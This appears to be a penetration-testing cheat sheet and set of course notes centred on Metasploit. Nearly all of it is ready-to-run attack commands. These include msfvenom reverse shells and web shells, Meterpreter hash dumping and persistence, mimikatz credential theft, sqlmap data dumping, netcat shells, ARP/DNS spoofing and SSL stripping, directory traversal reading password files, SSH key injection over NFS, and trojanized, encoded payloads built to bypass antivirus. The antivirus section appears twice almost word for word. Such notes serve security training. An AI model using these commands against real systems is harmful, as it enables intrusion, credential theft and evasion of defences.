Tag: penetration test

Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho


II. Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads


Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl


For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

IV. Shellcode


Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f


Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f


Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f


Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive 

your incoming shells. Handlers should be in the following format.


VI. Handlers

use exploit/multi/handler
set PAYLOAD 
set LHOST 
set LPORT 
set ExitOnSession false
exploit -j -z


Meterpreter Useful Commands:



upload file c:\\windows





upload file c:\\windows





download c:\\windows\\repair\\sam /tmp





execute -f c:\\windows\temp\exploit.exe





execute -f cmd -c 





ps





shell





getsystem





hashdump





portfwd add –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target


Additional useful commands are as follows:

  • msfconsole – r unicorn.rb

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure –d –k

  • shell


    • netsh firewall set opmode disable //disable firewall


  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"

  • shell


    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll

    • getLogonPasswords

    • sekurlsa::logonPasswords full


  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196

  • attrib +h c:\autoexec.bat //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

Burp Suite and sqlmap

1. Burpsuite -> Intruder
 http://www.site.com/section.php?id=51

2. sqlmap
python sqlmap.py -u “http://www.site.com/section.php?id=51”

# Discover databases
python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs

# Find tables in a particular database
python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D database_name

# Get columns of the table
python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D database_name -T users

# Get data from the columns
python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D database_name -T users

# Upload os-shell
python sqlmap.py -u “http://www.site.com/section.php?id=51” –os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary “Advanced Penetration Test”
Opening a command shell listener:root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:Redirect output to a file:root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating Tasks with cron jobsAdd your task to one of the scheduled directories

​*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
​root@kali:~# host http://www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer 
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com

​(5) Netcraft
http://searchdns.netcraft.com/​

(6) ​The HarvesterThe Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d ________.com -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed [recon-ng][default][xssed] > show options
recon-ng [xssed] > set DOMAIN ________.com
DOMAIN => ________.com
recon-ng [xssed] > run

(9) Port Scanning
Nmap
root@kali:~# nmap -sS 192.168.20.9-11 -oA synscan
root@kali:~# nmap -sU 192.168.20.9-11 -oA udpscan

Metasploit Port Scanners​
search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, exploit, etc..)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting EngineVulnerability scripts
Listed in /usr/share/nmap/scripts in Kali 

nmap -sC 172.16.85.135-136 
nmap –script-help=smb-check-vulns 
nmap –script=nfs-ls 172.16.85.136 
nmap –script=smb-os-discovery 172.16.85.136

(3) Metasploit Scanners​auxiliary/scanner/ftp/anonymous 

Web Application Scanning​
(1) DirbusterGraphical tool that is used for bruteforcing directories and pages.

(2) NiktoVulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 http://www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)​
Crypto between browser and webserver
Can’t see credentials in plaintext

SSL Man in the Middle​
SSL Stripping​
iptables -t nat -A PREROUTING -p tcp — destination-port 80 -j REDIRECT –to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) ​Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232 GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) ​Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a 🙂 spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount –e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs –o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/

Password Attacks

Source: Georgia Weidman on “Advanced Penetration Test”
(1) Crunch
Tool to bruteforce keyspace

$: crunch 7 7 AB
Bruteforces all 7 character passwords composed of only the characters A and B

(2) ceWL
Tool to map a website and pull potentially interesting words to add to a wordlist

$: cewl -w [words].txt -d 1 -m 5 http://www.[website].com
Depth 1
Minimum length of word is 5 characters

(3) Hydra
Online password cracking tool

$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks​

(1) Opening the SAM File
We got access to a backup of the SAM and SYSTEM files with the directory traversal vulnerability.

You can also get access to these files with physical access unless they have a BIOS password in place.

$: bkhive system xpkey.txt
$: samdump2 sam xpkey.txt

(2) John the Ripper
$: john xphashes.txt johnlinuxpasswords.txt –wordlist=passwordfile.txt

(3) oclHashcat
Can use GPUs to crack faster

Online Password Cracking
http://tools.question-defense.com
http://cloudcracker.com

Windows Credential Editor​
Tool to pull plaintext passwords etc out of the memory of the LSASS process
*Have to drop the binary onto the system

wce.exe -w

Advanced Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary

(1) Client Side Exploits
Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating ‘msf.pdf’ file…
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444

(4) PDF Embedded Executable
msf > use exploit/windows/fileformat/adobe_pdf_embedde d_exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /usr/share/set/readme/User_Manual.pdf msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.9
msf exploit(adobe_pdf_embedded_exe) > exploit

(5) ​Java Exploits
msf > use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean) > set SRVHOST 192.168.20.9
msf exploit(java_jre17_jmxbean) > set SRVPORT 80
msf exploit(java_jre17_jmxbean) > set URIPATH javaexploit
msf exploit(java_jre17_jmxbean) > show payloads
msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_http

(6) Java Applets​
msf exploit(java_jre17_jmxbean) > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set APPLETNAME [APPNAME]
msf exploit(java_signed_applet) > set SRVHOST 192.168.20.9
msf exploit(java_signed_applet) > set SRVPORT 80

(7) Browser Autopwn​
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.20.9 LHOST => 192.168.20.9
msf auxiliary(browser_autopwn) > set URIPATH autopwn URIPATH => autopwn
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] — Done, found 16 exploit modules
[*] Using URL: http://0.0.0.0:8080/autopwn
[*] Local IP: http://192.168.20.9:8080/autopwn
[*] Server started.

(8) Winamp Skin Example​
msf > use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set LHOST 192.168.20.9
msf exploit(winamp_maki_bof) > exploit

Social Engineering​
setoolkit

Trojans
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windowsbinaries/radmin.exe -k -f exe > radmin.exe

-x executable template
-k run the shellcode in a new thread

Metasploit Encoding​
We can also run our shellcode through an encoder to obfuscate it.

msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe

Multi-Encoding​
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw> meterpreterencoded.bin
msfvenom -p -f exe -a x86 –platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin

Combining Techniques​
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

Custom Compiling
#include unsigned char
random[]=
unsigned char shellcode[]=

int main(void) {
     ((void (*)())shellcode)();
}

Creating Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

Creating Randomness: 
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

Hyperion
Encrypts with AES encryption and throws away the key.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe

cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe

Veil
Framework for using different techniques to bypass antivirus

cd Veil-Evasion-master
./Veil-Evasion.py ​

Bypassing Anti-Virus Signature Detection

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary

Trojans:  Bypassing Anti-Virus Signature Detection

Techniques:
1- Binary Embedding
2- Metasploit Encoding​
3- Multi-Encoding​
4- Combining Tecnniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion
8- Veil

(1) Binary Embedding msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windowsbinaries/radmin.exe -k -f exe > radmin.exe

-x executable template
-k run the shellcode in a new thread

(2) Metasploit Encoding​We can also run our shellcode through an encoder to obfuscate it.

msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe

(3) Multi-Encoding​msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw> meterpreterencoded.bin
msfvenom -p -f exe -a x86 –platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin

(4) Combining Techniques​msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe

(5) Custom Compiling#include unsigned char
random[]=
unsigned char shellcode[]=

int main(void) {
     ((void (*)())shellcode)();
}

(6) Creating Shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

Creating Randomness: 
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

(7) HyperionEncrypts with AES encryption and throws away the key.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe

cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe

(8) VeilFramework for using different techniques to bypass antivirus

cd Veil-Evasion-master
./Veil-Evasion.py ​